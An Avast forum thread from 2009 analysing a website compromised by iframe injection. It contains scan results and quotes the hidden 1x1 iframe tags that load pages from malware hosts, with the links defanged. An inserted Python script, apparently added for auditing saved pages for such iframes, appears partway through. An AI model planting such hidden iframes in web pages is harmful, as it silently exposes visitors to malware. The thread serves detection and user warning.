Author Topic: nasha-russia.tv - HTML:Iframe-inf  (Read 7796 times)


Offline sewaq

  • Newbie
  • *
  • Posts: 1
nasha-russia.tv - HTML:Iframe-inf
« on: April 29, 2009, 01:27:06 PM »
hxxp://nasha-russia.tv/

Offline Omid Farhang

  • Malware Hunter
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1661
  • I wish I could write longer personal text!!
    • Omid's Site
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #1 on: April 29, 2009, 01:35:27 PM »
A virus or unwanted program has been detected
in the HTTP data on the requested page.

Requested URL:   hxxp://nasha-russia.tv/
Information:        Contains recognition pattern of the HTML/Infected.WebPage.Gen HTML script virus

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32429
  • malware fighter
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #2 on: April 29, 2009, 09:56:25 PM »
Hi sewaq,

DrWeb's av link checker gives it as red - infected -
Checking: hxtp://nasha-russia.tv/
Engine version: 5.0.0.12182
Total virus-finding records: 539455
File size: 45.05 KB
File MD5: 4c7dd71d5934d7cab5a3aeefe3dfd339

hxtp://nasha-russia.tv/ - archive HTML
>hxttp://nasha-russia.tv//JavaScript.0 - Ok
>hxtp://nasha-russia.tv//Script.1 - Ok
>hxtp://nasha-russia.tv//Script.2 - Ok
>hxtp://nasha-russia.tv//Script.3 - Ok
>hxtp://nasha-russia.tv//Script.4 - Ok
>hxtp://nasha-russia.tv//Script.5 - Ok
>hxtp://nasha-russia.tv//JavaScript.6 - Ok
>hxtp://nasha-russia.tv//JavaScript1.1.7 - Ok
>hxtp://nasha-russia.tv//JavaScript1.2.8 - Ok
>hxtp://nasha-russia.tv//JavaScript1.3.9 - Ok
>hxtp://nasha-russia.tv//JavaScript.10 - Ok
>hxtp://nasha-russia.tv//JavaScript.11 - Ok
hxtp://nasha-russia.tv/ - Ok

Checking: hxtp://pagead2.googlesyndication.com/pagead/show_ads.js
File size: 29.44 KB
File MD5: 24c7aba78e61147132b46e48e6743e71

hxtp://pagead2.googlesyndication.com/pagead/show_ads.js - Ok

Checking: hxtp://lotbetworld.cn/in.cgi?income36
File size: 8978 bytes
File MD5: 98ccf1db761c14c99d26177ac88722b1

hxtp://lotbetworld.cn/in.cgi?income36 - archive MAIL
xttp://lotbetworld.cn/in.cgi?income36/ - archive HTML
>hxtp://lotbetworld.cn/in.cgi?income36//Script.0 infected with Trojan.DownLoad.35036

Checking: hxtp://nasha-russia.tv/includes/jscript.js
File size: 2849 bytes
File MD5: 50f24195e48db586910fffb5f7f5a614

hxtp://nasha-russia.tv/includes/jscript.js - Ok
Re: hxtp://virusinfo.info/showthread.php?t=44061

polonus
« Last Edit: April 29, 2009, 10:00:17 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline CharleyO

  • Avast Evangelist
  • Starting Graphoman
  • ***
  • Posts: 7087
  • Be alert for error code - ID 10T
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #3 on: April 29, 2009, 10:12:28 PM »
***

Well, Polonus beat me to it but here is a little more information.

One iframe infection is outside the html tag at the top of the page and looks like this:

<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>
(I changed the http to hxxp to disable the link)

I counted at least 12 JavaScript infections throughout the page.

There are 2 more iframe infections outside the html tag at the bottom of the page:

<iframe src="hxxp://google-ana1yticz.com/?click=486812" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>


***
« Last Edit: April 29, 2009, 10:15:52 PM by CharleyO »
Self-built desktop (8 years old) - AMD64 3200+_Gigabyte GA-K8NS Ultra-939_4 gb RAM_GeForceFX 5800w/256 ram_XP/SP3_Avast 7_MBAM_ZA Free __and__ Toshiba Satellite Laptop_W7-64bit_ 4 gb Ram_Avast 8_MBAM
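The injection pattern described in the reply above (1x1, hidden iframes sitting before `<html>` and after `</html>`) can be checked for when auditing a saved copy of a page. The following is an added example, not code from any poster in this thread; the `audit` function, the reason labels and the sample markup are assumptions built around the three iframe tags quoted above, kept defanged as `hxxp`.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

def _tiny(value):
    """True for a 0- or 1-pixel dimension such as width=1 or width="1px"."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1

class IframeAudit(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host, self.in_html, self.findings = page_host, False, []

    def handle_starttag(self, tag, attrs):
        if tag == "html":
            self.in_html = True
        elif tag == "iframe":
            a, reasons = dict(attrs), []
            if not self.in_html:  # before <html> or after </html>
                reasons.append("outside-html")
            if _tiny(a.get("width")) and _tiny(a.get("height")):
                reasons.append("1x1")
            if HIDDEN_CSS.search(a.get("style") or ""):
                reasons.append("hidden-style")
            if reasons:  # a visible, in-document embed is not reported
                host = urlparse(a.get("src") or "").hostname
                if host and host != self.page_host:
                    reasons.append("off-site")
                self.findings.append({"line": self.getpos()[0], "host": host, "reasons": reasons})

    def handle_endtag(self, tag):
        if tag == "html":
            self.in_html = False

def audit(html, page_host):
    parser = IframeAudit(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: the three iframes quoted in the post around a made-up clean page.
SAMPLE = """<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>
<html><head><title>constructed</title></head><body>
<iframe src="/player/embed.html" width="640" height="360"></iframe>
</body></html>
<iframe src="hxxp://google-ana1yticz.com/?click=486812" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="hxxp://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE, "nasha-russia.tv"):
        print(finding)
```

Run it against a copy of the page saved as text, not by browsing to the live site.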

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2220
    • The WAR Against Malware
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #4 on: April 29, 2009, 10:36:53 PM »
Went to the site without pro version and got infected. :-X
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline CharleyO

  • Avast Evangelist
  • Starting Graphoman
  • ***
  • Posts: 7087
  • Be alert for error code - ID 10T
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #5 on: April 30, 2009, 12:52:59 AM »
***

Since Polonus and I had already checked it out, why did you go there?    ???

We already said it was infected. You need a little more experience before doing such things.


***

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2220
    • The WAR Against Malware
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #6 on: April 30, 2009, 02:16:20 AM »
***

Since Polonus and I had already checked it out, why did you go there?    ???

We already said it was infected. You need a little more experience before doing such things.


***

I wanted to see what the virus does. ;D Besides, I think I can remove the virus via Boot-Time Scanning!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32429
  • malware fighter
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #7 on: April 30, 2009, 02:32:31 AM »
Hi Donovansrb10,

People that download viruses to see what they do aren't just average users. These people download viruses in special lab settings, where they cannot infect outside a virtual machine. They have to take a lot of precautions and need a lot of special analyzing tools. Well, if you download Vitro file infector, you can see what is meant; if you do that, you can completely f-disk, format and re-install your Operational System, so-called total recall, not a nice thing to experience, seeing your computer being ruined by a virus. Malware is no plaything, and malware should be kept from computers by all means. The real hero here is the man or woman or kid that did not have a virus for years and years, because he or she or it is computer-savvy and security aware,

polonus

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 83009
  • No support PMs thanks
Re: nasha-russia.tv - HTML:Iframe-inf
« Reply #8 on: April 30, 2009, 03:19:46 AM »
That goes double when you have absolutely no idea what the payload at the other end of the link could be.

One member who I would also say is more experienced tried this and without a robust back-up and recovery strategy (hard disk imaging, etc.) he ended up formatting his system and reinstalling everything. What he got hit by was Vitro/Virut and you only have to check this forum to see the destruction it reaps with most ending up on a fdisk, format and reinstall.

So this strategy is IMHO totally stupid, unless you are on a test machine that you wipe after the test.
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 1909 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 20.2.2401 (build 20.2.5130.570) UI-1.0.505/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro